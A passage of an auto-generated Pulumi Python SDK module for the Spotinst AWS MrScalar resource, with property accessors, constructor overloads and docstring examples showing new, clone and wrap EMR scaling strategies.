def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]]:
"""
A list of tags to assign to the resource. You may define multiple tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="taskDesiredCapacity")
def task_desired_capacity(self) -> Optional[pulumi.Input[int]]:
"""
amount of instances in task group.
"""
return pulumi.get(self, "task_desired_capacity")
@task_desired_capacity.setter
def task_desired_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "task_desired_capacity", value)
@property
@pulumi.getter(name="taskEbsBlockDevices")
def task_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]]:
"""
This determines the ebs configuration for your task group instances. Only a single block is allowed.
"""
return pulumi.get(self, "task_ebs_block_devices")
@task_ebs_block_devices.setter
def task_ebs_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]]):
pulumi.set(self, "task_ebs_block_devices", value)
@property
@pulumi.getter(name="taskEbsOptimized")
def task_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "task_ebs_optimized")
@task_ebs_optimized.setter
def task_ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "task_ebs_optimized", value)
@property
@pulumi.getter(name="taskInstanceTypes")
def task_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The MrScaler instance types for the task nodes.
"""
return pulumi.get(self, "task_instance_types")
@task_instance_types.setter
def task_instance_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "task_instance_types", value)
@property
@pulumi.getter(name="taskLifecycle")
def task_lifecycle(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "task_lifecycle")
@task_lifecycle.setter
def task_lifecycle(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "task_lifecycle", value)
@property
@pulumi.getter(name="taskMaxSize")
def task_max_size(self) -> Optional[pulumi.Input[int]]:
"""
maximal amount of instances in task group.
"""
return pulumi.get(self, "task_max_size")
@task_max_size.setter
def task_max_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "task_max_size", value)
@property
@pulumi.getter(name="taskMinSize")
def task_min_size(self) -> Optional[pulumi.Input[int]]:
"""
The minimal amount of instances in task group.
"""
return pulumi.get(self, "task_min_size")
@task_min_size.setter
def task_min_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "task_min_size", value)
    @property
    @pulumi.getter(name="taskScalingDownPolicies")
    def task_scaling_down_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]]:
        """
        Scaling-down policies for the task group (see `MrScalarTaskScalingDownPolicyArgs`).
        """
        return pulumi.get(self, "task_scaling_down_policies")
    @task_scaling_down_policies.setter
    def task_scaling_down_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]]):
        pulumi.set(self, "task_scaling_down_policies", value)
    @property
    @pulumi.getter(name="taskScalingUpPolicies")
    def task_scaling_up_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]]:
        """
        Scaling-up policies for the task group (see `MrScalarTaskScalingUpPolicyArgs`).
        """
        return pulumi.get(self, "task_scaling_up_policies")
    @task_scaling_up_policies.setter
    def task_scaling_up_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]]):
        pulumi.set(self, "task_scaling_up_policies", value)
@property
@pulumi.getter(name="taskUnit")
def task_unit(self) -> Optional[pulumi.Input[str]]:
"""
Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
"""
return pulumi.get(self, "task_unit")
@task_unit.setter
def task_unit(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "task_unit", value)
@property
@pulumi.getter(name="terminationPolicies")
def termination_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]]:
"""
Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
"""
return pulumi.get(self, "termination_policies")
@termination_policies.setter
def termination_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]]):
pulumi.set(self, "termination_policies", value)
@property
@pulumi.getter(name="terminationProtected")
def termination_protected(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
"""
return pulumi.get(self, "termination_protected")
@termination_protected.setter
def termination_protected(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "termination_protected", value)
    @property
    @pulumi.getter(name="visibleToAllUsers")
    def visible_to_all_users(self) -> Optional[pulumi.Input[bool]]:
        """
        DEPRECATED. This field has been removed from the API and is no longer functional (setting it in the constructor emits a DeprecationWarning).
        """
        return pulumi.get(self, "visible_to_all_users")
    @visible_to_all_users.setter
    def visible_to_all_users(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "visible_to_all_users", value)
class MrScalar(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
additional_info: Optional[pulumi.Input[str]] = None,
additional_primary_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
additional_replica_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
applications: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarApplicationArgs']]]]] = None,
availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
bootstrap_actions_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarBootstrapActionsFileArgs']]]]] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
configurations_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarConfigurationsFileArgs']]]]] = None,
core_desired_capacity: Optional[pulumi.Input[int]] = None,
core_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreEbsBlockDeviceArgs']]]]] = None,
core_ebs_optimized: Optional[pulumi.Input[bool]] = None,
core_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
core_lifecycle: Optional[pulumi.Input[str]] = None,
core_max_size: Optional[pulumi.Input[int]] = None,
core_min_size: Optional[pulumi.Input[int]] = None,
core_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingDownPolicyArgs']]]]] = None,
core_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingUpPolicyArgs']]]]] = None,
core_unit: Optional[pulumi.Input[str]] = None,
custom_ami_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
ebs_root_volume_size: Optional[pulumi.Input[int]] = None,
ec2_key_name: Optional[pulumi.Input[str]] = None,
expose_cluster_id: Optional[pulumi.Input[bool]] = None,
instance_weights: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarInstanceWeightArgs']]]]] = None,
job_flow_role: Optional[pulumi.Input[str]] = None,
keep_job_flow_alive: Optional[pulumi.Input[bool]] = None,
log_uri: Optional[pulumi.Input[str]] = None,
managed_primary_security_group: Optional[pulumi.Input[str]] = None,
managed_replica_security_group: Optional[pulumi.Input[str]] = None,
master_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarMasterEbsBlockDeviceArgs']]]]] = None,
master_ebs_optimized: Optional[pulumi.Input[bool]] = None,
master_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
master_lifecycle: Optional[pulumi.Input[str]] = None,
master_target: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
provisioning_timeout: Optional[pulumi.Input[pulumi.InputType['MrScalarProvisioningTimeoutArgs']]] = None,
region: Optional[pulumi.Input[str]] = None,
release_label: Optional[pulumi.Input[str]] = None,
repo_upgrade_on_boot: Optional[pulumi.Input[str]] = None,
retries: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarScheduledTaskArgs']]]]] = None,
security_config: Optional[pulumi.Input[str]] = None,
service_access_security_group: Optional[pulumi.Input[str]] = None,
service_role: Optional[pulumi.Input[str]] = None,
steps_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarStepsFileArgs']]]]] = None,
strategy: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTagArgs']]]]] = None,
task_desired_capacity: Optional[pulumi.Input[int]] = None,
task_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskEbsBlockDeviceArgs']]]]] = None,
task_ebs_optimized: Optional[pulumi.Input[bool]] = None,
task_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
task_lifecycle: Optional[pulumi.Input[str]] = None,
task_max_size: Optional[pulumi.Input[int]] = None,
task_min_size: Optional[pulumi.Input[int]] = None,
task_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingDownPolicyArgs']]]]] = None,
task_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingUpPolicyArgs']]]]] = None,
task_unit: Optional[pulumi.Input[str]] = None,
termination_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTerminationPolicyArgs']]]]] = None,
termination_protected: Optional[pulumi.Input[bool]] = None,
visible_to_all_users: Optional[pulumi.Input[bool]] = None,
__props__=None):
"""
Provides a Spotinst AWS MrScaler resource.
## Example Usage
### New Strategy
```python
import pulumi
import pulumi_spotinst as spotinst
sample__mr_scaler_01 = spotinst.aws.MrScalar("sample-MrScaler-01",
additional_info="{'test':'more information'}",
additional_primary_security_groups=["sg-456321"],
additional_replica_security_groups=["sg-123654"],
applications=[
spotinst.aws.MrScalarApplicationArgs(
name="Ganglia",
version="1.0",
),
spotinst.aws.MrScalarApplicationArgs(
name="Hadoop",
),
spotinst.aws.MrScalarApplicationArgs(
args=[
"fake",
"args",
],
name="Pig",
),
],
availability_zones=["us-west-2a:subnet-123456"],
bootstrap_actions_files=[spotinst.aws.MrScalarBootstrapActionsFileArgs(
bucket="sample-emr-test",
key="bootstrap-actions.json",
)],
configurations_files=[spotinst.aws.MrScalarConfigurationsFileArgs(
bucket="example-bucket",
key="configurations.json",
)],
core_desired_capacity=1,
core_ebs_block_devices=[spotinst.aws.MrScalarCoreEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
core_ebs_optimized=False,
core_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
core_lifecycle="ON_DEMAND",
core_max_size=1,
core_min_size=1,
core_unit="instance",
custom_ami_id="ami-123456",
description="Testing MrScaler creation",
ec2_key_name="test-key",
instance_weights=[
spotinst.aws.MrScalarInstanceWeightArgs(
instance_type="t2.small",
weighted_capacity=10,
),
spotinst.aws.MrScalarInstanceWeightArgs(
instance_type="t2.medium",
weighted_capacity=90,
),
],
job_flow_role="EMR_EC2_ExampleRole",
keep_job_flow_alive=True,
log_uri="s3://example-logs",
managed_primary_security_group="sg-123456",
managed_replica_security_group="sg-987654",
master_ebs_block_devices=[spotinst.aws.MrScalarMasterEbsBlockDeviceArgs(
size_in_gb=30,
volume_type="gp2",
volumes_per_instance=1,
)],
master_ebs_optimized=True,
master_instance_types=["c3.xlarge"],
master_lifecycle="SPOT",
master_target=1,
provisioning_timeout=spotinst.aws.MrScalarProvisioningTimeoutArgs(
timeout=15,
timeout_action="terminateAndRetry",
),
region="us-west-2",
release_label="emr-5.17.0",
repo_upgrade_on_boot="NONE",
retries=2,
security_config="example-config",
service_access_security_group="access-example",
service_role="example-role",
steps_files=[spotinst.aws.MrScalarStepsFileArgs(
bucket="example-bucket",
key="steps.json",
)],
strategy="new",
tags=[spotinst.aws.MrScalarTagArgs(
key="Creator",
value="Pulumi",
)],
task_desired_capacity=1,
task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
task_ebs_optimized=False,
task_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
task_lifecycle="SPOT",
task_max_size=30,
task_min_size=0,
task_unit="instance",
termination_protected=False)
```
### Clone Strategy
```python
import pulumi
import pulumi_spotinst as spotinst
sample__mr_scaler_01 = spotinst.aws.MrScalar("sample-MrScaler-01",
availability_zones=["us-west-2a:subnet-12345678"],
cluster_id="j-123456789",
core_desired_capacity=1,
core_ebs_block_devices=[spotinst.aws.MrScalarCoreEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
core_ebs_optimized=False,
core_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
core_lifecycle="ON_DEMAND",
core_max_size=1,
core_min_size=1,
core_unit="instance",
description="Testing MrScaler creation",
expose_cluster_id=True,
master_ebs_block_devices=[spotinst.aws.MrScalarMasterEbsBlockDeviceArgs(
size_in_gb=30,
volume_type="gp2",
volumes_per_instance=1,
)],
master_ebs_optimized=True,
master_instance_types=["c3.xlarge"],
master_lifecycle="SPOT",
master_target=1,
region="us-west-2",
strategy="clone",
tags=[spotinst.aws.MrScalarTagArgs(
key="Creator",
value="Pulumi",
)],
task_desired_capacity=1,
task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
task_ebs_optimized=False,
task_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
task_lifecycle="SPOT",
task_max_size=30,
task_min_size=0,
task_scaling_down_policies=[spotinst.aws.MrScalarTaskScalingDownPolicyArgs(
action_type="",
adjustment="1",
cooldown=60,
dimensions={
"name": "name-1",
"value": "value-1",
},
evaluation_periods=10,
max_target_capacity="1",
maximum="10",
metric_name="CPUUtilization",
minimum="0",
namespace="AWS/EC2",
operator="gt",
period=60,
policy_name="policy-name",
statistic="average",
target="5",
threshold=10,
unit="",
)],
task_unit="instance")
pulumi.export("mrscaler-name", sample__mr_scaler_01.name)
pulumi.export("mrscaler-created-cluster-id", sample__mr_scaler_01.output_cluster_id)
```
### Wrap Strategy
```python
import pulumi
import pulumi_spotinst as spotinst
example_scaler_2 = spotinst.aws.MrScalar("example-scaler-2",
cluster_id="j-27UVDEHXL4OQM",
description="created by Pulumi",
region="us-west-2",
strategy="wrap",
task_desired_capacity=2,
task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
size_in_gb=20,
volume_type="gp2",
volumes_per_instance=1,
)],
task_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
task_lifecycle="SPOT",
task_max_size=4,
task_min_size=0,
task_unit="instance")
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] additional_info: This is meta information about third-party applications that third-party vendors use for testing purposes.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_primary_security_groups: A list of additional Amazon EC2 security group IDs for the master node.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_replica_security_groups: A list of additional Amazon EC2 security group IDs for the core and task nodes.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarApplicationArgs']]]] applications: A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
:param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zones: List of AZs and their subnet Ids. See example above for usage.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarBootstrapActionsFileArgs']]]] bootstrap_actions_files: Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
:param pulumi.Input[str] cluster_id: The MrScaler cluster id.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarConfigurationsFileArgs']]]] configurations_files: Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
:param pulumi.Input[int] core_desired_capacity: amount of instances in core group.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreEbsBlockDeviceArgs']]]] core_ebs_block_devices: This determines the ebs configuration for your core group instances. Only a single block is allowed.
:param pulumi.Input[bool] core_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] core_instance_types: The MrScaler instance types for the core nodes.
:param pulumi.Input[str] core_lifecycle: The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] core_max_size: maximal amount of instances in core group.
:param pulumi.Input[int] core_min_size: The minimal amount of instances in core group.
:param pulumi.Input[str] core_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
:param pulumi.Input[str] custom_ami_id: The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
:param pulumi.Input[str] description: The MrScaler description.
:param pulumi.Input[str] ec2_key_name: The name of an Amazon EC2 key pair that can be used to ssh to the master node.
:param pulumi.Input[bool] expose_cluster_id: Allow the `cluster_id` to set a provider output variable.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarInstanceWeightArgs']]]] instance_weights: Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
:param pulumi.Input[str] job_flow_role: The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
:param pulumi.Input[bool] keep_job_flow_alive: Specifies whether the cluster should remain available after completing all steps.
:param pulumi.Input[str] log_uri: The path to the Amazon S3 location where logs for this cluster are stored.
:param pulumi.Input[str] managed_primary_security_group: EMR Managed Security group that will be set to the primary instance group.
:param pulumi.Input[str] managed_replica_security_group: EMR Managed Security group that will be set to the replica instance group.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarMasterEbsBlockDeviceArgs']]]] master_ebs_block_devices: This determines the ebs configuration for your master group instances. Only a single block is allowed.
:param pulumi.Input[bool] master_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] master_instance_types: The MrScaler instance types for the master nodes.
:param pulumi.Input[str] master_lifecycle: The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] master_target: Number of instances in the master group.
:param pulumi.Input[str] name: The application name.
:param pulumi.Input[str] region: The MrScaler region.
:param pulumi.Input[str] repo_upgrade_on_boot: Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
:param pulumi.Input[int] retries: Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarScheduledTaskArgs']]]] scheduled_tasks: An array of scheduled tasks.
:param pulumi.Input[str] security_config: The name of the security configuration applied to the cluster.
:param pulumi.Input[str] service_access_security_group: The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
:param pulumi.Input[str] service_role: The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarStepsFileArgs']]]] steps_files: Steps from S3.
:param pulumi.Input[str] strategy: The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTagArgs']]]] tags: A list of tags to assign to the resource. You may define multiple tags.
:param pulumi.Input[int] task_desired_capacity: amount of instances in task group.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskEbsBlockDeviceArgs']]]] task_ebs_block_devices: This determines the ebs configuration for your task group instances. Only a single block is allowed.
:param pulumi.Input[bool] task_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] task_instance_types: The MrScaler instance types for the task nodes.
:param pulumi.Input[str] task_lifecycle: The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] task_max_size: maximal amount of instances in task group.
:param pulumi.Input[int] task_min_size: The minimal amount of instances in task group.
:param pulumi.Input[str] task_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTerminationPolicyArgs']]]] termination_policies: Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
:param pulumi.Input[bool] termination_protected: Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: MrScalarArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Spotinst AWS MrScaler resource.
This overload takes a single, fully-populated ``MrScalarArgs`` object;
a sibling overload accepts each resource property as an individual
keyword argument instead.
## Example Usage
### New Strategy
```python
import pulumi
import pulumi_spotinst as spotinst
sample__mr_scaler_01 = spotinst.aws.MrScalar("sample-MrScaler-01",
additional_info="{'test':'more information'}",
additional_primary_security_groups=["sg-456321"],
additional_replica_security_groups=["sg-123654"],
applications=[
spotinst.aws.MrScalarApplicationArgs(
name="Ganglia",
version="1.0",
),
spotinst.aws.MrScalarApplicationArgs(
name="Hadoop",
),
spotinst.aws.MrScalarApplicationArgs(
args=[
"fake",
"args",
],
name="Pig",
),
],
availability_zones=["us-west-2a:subnet-123456"],
bootstrap_actions_files=[spotinst.aws.MrScalarBootstrapActionsFileArgs(
bucket="sample-emr-test",
key="bootstrap-actions.json",
)],
configurations_files=[spotinst.aws.MrScalarConfigurationsFileArgs(
bucket="example-bucket",
key="configurations.json",
)],
core_desired_capacity=1,
core_ebs_block_devices=[spotinst.aws.MrScalarCoreEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
core_ebs_optimized=False,
core_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
core_lifecycle="ON_DEMAND",
core_max_size=1,
core_min_size=1,
core_unit="instance",
custom_ami_id="ami-123456",
description="Testing MrScaler creation",
ec2_key_name="test-key",
instance_weights=[
spotinst.aws.MrScalarInstanceWeightArgs(
instance_type="t2.small",
weighted_capacity=10,
),
spotinst.aws.MrScalarInstanceWeightArgs(
instance_type="t2.medium",
weighted_capacity=90,
),
],
job_flow_role="EMR_EC2_ExampleRole",
keep_job_flow_alive=True,
log_uri="s3://example-logs",
managed_primary_security_group="sg-123456",
managed_replica_security_group="sg-987654",
master_ebs_block_devices=[spotinst.aws.MrScalarMasterEbsBlockDeviceArgs(
size_in_gb=30,
volume_type="gp2",
volumes_per_instance=1,
)],
master_ebs_optimized=True,
master_instance_types=["c3.xlarge"],
master_lifecycle="SPOT",
master_target=1,
provisioning_timeout=spotinst.aws.MrScalarProvisioningTimeoutArgs(
timeout=15,
timeout_action="terminateAndRetry",
),
region="us-west-2",
release_label="emr-5.17.0",
repo_upgrade_on_boot="NONE",
retries=2,
security_config="example-config",
service_access_security_group="access-example",
service_role="example-role",
steps_files=[spotinst.aws.MrScalarStepsFileArgs(
bucket="example-bucket",
key="steps.json",
)],
strategy="new",
tags=[spotinst.aws.MrScalarTagArgs(
key="Creator",
value="Pulumi",
)],
task_desired_capacity=1,
task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
task_ebs_optimized=False,
task_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
task_lifecycle="SPOT",
task_max_size=30,
task_min_size=0,
task_unit="instance",
termination_protected=False)
```
### Clone Strategy
```python
import pulumi
import pulumi_spotinst as spotinst
sample__mr_scaler_01 = spotinst.aws.MrScalar("sample-MrScaler-01",
availability_zones=["us-west-2a:subnet-12345678"],
cluster_id="j-123456789",
core_desired_capacity=1,
core_ebs_block_devices=[spotinst.aws.MrScalarCoreEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
core_ebs_optimized=False,
core_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
core_lifecycle="ON_DEMAND",
core_max_size=1,
core_min_size=1,
core_unit="instance",
description="Testing MrScaler creation",
expose_cluster_id=True,
master_ebs_block_devices=[spotinst.aws.MrScalarMasterEbsBlockDeviceArgs(
size_in_gb=30,
volume_type="gp2",
volumes_per_instance=1,
)],
master_ebs_optimized=True,
master_instance_types=["c3.xlarge"],
master_lifecycle="SPOT",
master_target=1,
region="us-west-2",
strategy="clone",
tags=[spotinst.aws.MrScalarTagArgs(
key="Creator",
value="Pulumi",
)],
task_desired_capacity=1,
task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
task_ebs_optimized=False,
task_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
task_lifecycle="SPOT",
task_max_size=30,
task_min_size=0,
task_scaling_down_policies=[spotinst.aws.MrScalarTaskScalingDownPolicyArgs(
action_type="",
adjustment="1",
cooldown=60,
dimensions={
"name": "name-1",
"value": "value-1",
},
evaluation_periods=10,
max_target_capacity="1",
maximum="10",
metric_name="CPUUtilization",
minimum="0",
namespace="AWS/EC2",
operator="gt",
period=60,
policy_name="policy-name",
statistic="average",
target="5",
threshold=10,
unit="",
)],
task_unit="instance")
pulumi.export("mrscaler-name", sample__mr_scaler_01.name)
pulumi.export("mrscaler-created-cluster-id", sample__mr_scaler_01.output_cluster_id)
```
### Wrap Strategy
```python
import pulumi
import pulumi_spotinst as spotinst
example_scaler_2 = spotinst.aws.MrScalar("example-scaler-2",
cluster_id="j-27UVDEHXL4OQM",
description="created by Pulumi",
region="us-west-2",
strategy="wrap",
task_desired_capacity=2,
task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
size_in_gb=20,
volume_type="gp2",
volumes_per_instance=1,
)],
task_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
task_lifecycle="SPOT",
task_max_size=4,
task_min_size=0,
task_unit="instance")
```
:param str resource_name: The name of the resource.
:param MrScalarArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
    """Dispatch construction to ``_internal_init``.

    Supports both documented calling conventions: a fully-built
    ``MrScalarArgs`` object, or the resource properties spelled out as
    individual keyword arguments. ``get_resource_args_opts`` decides
    which form the caller used.
    """
    parsed_args, parsed_opts = _utilities.get_resource_args_opts(MrScalarArgs, pulumi.ResourceOptions, *args, **kwargs)
    if parsed_args is None:
        # Keyword-argument form: forward the original call untouched.
        __self__._internal_init(resource_name, *args, **kwargs)
    else:
        # Args-object form: expand its fields into keyword arguments.
        __self__._internal_init(resource_name, parsed_opts, **parsed_args.__dict__)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
additional_info: Optional[pulumi.Input[str]] = None,
additional_primary_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
additional_replica_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
applications: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarApplicationArgs']]]]] = None,
availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
bootstrap_actions_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarBootstrapActionsFileArgs']]]]] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
configurations_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarConfigurationsFileArgs']]]]] = None,
core_desired_capacity: Optional[pulumi.Input[int]] = None,
core_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreEbsBlockDeviceArgs']]]]] = None,
core_ebs_optimized: Optional[pulumi.Input[bool]] = None,
core_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
core_lifecycle: Optional[pulumi.Input[str]] = None,
core_max_size: Optional[pulumi.Input[int]] = None,
core_min_size: Optional[pulumi.Input[int]] = None,
core_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingDownPolicyArgs']]]]] = None,
core_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingUpPolicyArgs']]]]] = None,
core_unit: Optional[pulumi.Input[str]] = None,
custom_ami_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
ebs_root_volume_size: Optional[pulumi.Input[int]] = None,
ec2_key_name: Optional[pulumi.Input[str]] = None,
expose_cluster_id: Optional[pulumi.Input[bool]] = None,
